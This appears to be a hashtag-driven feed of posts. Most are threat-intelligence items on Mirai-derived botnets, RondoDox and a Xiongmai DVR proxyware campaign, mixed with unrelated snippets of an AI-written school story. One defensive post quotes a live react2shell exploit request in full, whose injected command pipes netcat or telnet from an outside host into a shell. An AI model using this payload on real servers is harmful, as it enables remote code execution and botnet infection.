Mirai Variant and Monaco Miner Campaign Targeting Linux Systems

Two malware strains are targeting Linux systems CondiBot an evolved Mirai botnet used for DDoS attacks and Monaco an SSH brute-force and cryptocurrency mining campaign.

Pulse ID: 69c1943ae53f9148f6f7f398
Pulse Link: https://otx.alienvault.com/pulse/69c1943ae53f9148f6f7f398
Pulse Author: cryptocti
Created: 2026-03-23 19:27:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DDoS #DoS #InfoSec #Linux #Malware #Mirai #OTX #OpenThreatExchange #RCE #SSH #bot #botnet #cryptocurrency #cryptocti

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://www.deviantart.com/deadly-poison-0/art/Tetsu-gaku-ni-Shigokareta-ua-1253819448

<>

#AI小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

#AI小説 #shukuzu  哲学に扱かれた - Deadly_Poisonの小説 - pixiv

昼休みの喧騒は、まるで小宇宙の縮図だ。弁当を囲むグループ、次の授業の予習に勤しむ者、そしてスマホの小さな画面に未来と希望を託す者たち。 私のクラスメイト、相田まなみは後者だった。 「ねえねえ、テツ知ってる? これ! 『ブレイン・スパークグミ』! 記憶力が10倍になるって、今ネット

pixiv

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://www.pixiv.net/novel/show.php?id=26223706

<>

#AI小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

#AI小説 #kousha  Філософська прочуханка - Deadly_Poiso - pixiv

Гамір обідньої перерви — наче мікрокосм у мініатюрі. Тут є групи, що зібралися навколо своїх бенто, є ті, хто старанно готується до наступно

pixiv

Excellent work by @nicter_jp documenting a Xiongmai DVR campaign deploying residential proxy SDKs: https://blog.nicter.jp/2026/03/iot_proxyware/

We pulled the payloads and decompiled the chain.

The downloader is Mirai with all DDoS stripped out — repurposed as a vehicle for proxy monetization. It delivers two proxy SDKs: IPRoyal Pawns and PacketSDK, part of the IPIDEA network Google disrupted in January.

NICTER's IOC timeline tells the rest: PacketSDK v1.0.2 (original domains) → v1.0.6 (scrambled replacements) → v1.0.8.4 (single fallback) → not deployed. Every dispatch path is now NXDOMAIN.

A concrete view of Google's takedown continuing to have impact.

https://github.com/deepfield/public-research/blob/main/reports/2026-03-19-xiongmai-packetsdk-ipidea.md

#Mirai #IPIDEA #threatintel

Xiongmai DVR の既知の脆弱性を悪用したレジデンシャルプロキシ化事例の観測

1. 概要 既知の脆弱性(CVE-2024-3765)を悪用した攻撃が継続している Xiongmai DVR において、新たに Proxyware への感染事例を観測した。 当該事例では、従来の DDoS ボット化とは異なり、レジデンシャルプロキシ用途の Proxyware「PacketSDK」がインストールされ、実行されていた。

NICTER Blog

92.118.39[.]30 is trying to exploit #react2shell with the POST:
0={"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var+res=process.mainModule.require('child_process').execSync('(nc+45.135.194[.]27+3443+||+telnet+45.135.194[.]27+3443+||+busybox+nc+45.135.194[.]27+3443)+|+sh').toString().trim();;throw+Object.assign(new+Error('NEXT_REDIRECT'),{digest:+`NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}&1="$@0"&2=[]"

Netcat is used to trigger a #mirai downloader. Is interesting that the script atempts to kill a process using /var/Sofia (??)

#bot #malware #dfir

 哲学に扱かれた|Deadly_Poison

 昼休みの喧騒は、まるで小宇宙の縮図だ。弁当を囲むグループ、次の授業の予習に勤しむ者、そしてスマホの小さな画面に未来と希望を託す者たち。  私のクラスメイト、相田まなみは後者だった。  「ねえねえ、テツ知ってる? これ! 『ブレイン・スパークグミ』! 記憶力が10倍になるって、今ネットで超バズってるんだよ!」。  まなみは興奮した様子で、七色に輝くグミの広告画像を見せてきた。その瞳は、すでに10倍になったかのようにキラキラしている。  「ああ、それな!」。  会話に割って入ってきたのは、クラスの陽キャ代表、サッカー部の鈴木健太(すずき けんた)だ。「俺も昨日ポチったわ。これで期末テスト

note(ノート)

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://note.com/deadly_poison_0/n/n40c583137814

<>

#AI小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

 Філософська прочуханка|Deadly_Poison

 Гамір обідньої перерви — наче мікрокосм у мініатюрі. Тут є групи, що зібралися навколо своїх бенто, є ті, хто старанно готується до наступного уроку, і є ті, хто довіряє своє майбутнє та надії маленькому екрану смартфона.  Моя однокласниця, Аіда Манамі, належала до останніх.  «Слухай-но, Тецу,

note(ノート)

RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities

The RondoDox botnet has emerged as a significant threat, exploiting 174 different vulnerabilities since May 2025. It primarily targets IoT devices and internet-exposed services for DoS attacks. The botnet's infrastructure includes exploiting and hosting components, with evidence suggesting the use of compromised residential IPs. RondoDox's operators have shown a rapid adoption of newly disclosed vulnerabilities, sometimes exploiting them within days of publication. The botnet's evolution includes a shift from a shotgun approach using numerous exploits to a more focused strategy targeting recent, critical vulnerabilities. The malware shares similarities with Mirai but focuses solely on DoS attacks. This threat highlights the importance of exposure management in cybersecurity.

Pulse ID: 69b18f0dc8f031c3594cfcc9
Pulse Link: https://otx.alienvault.com/pulse/69b18f0dc8f031c3594cfcc9
Pulse Author: AlienVault
Created: 2026-03-11 15:49:33

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DoS #InfoSec #IoT #Malware #Mirai #OTX #OpenThreatExchange #RAT #bot #botnet #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange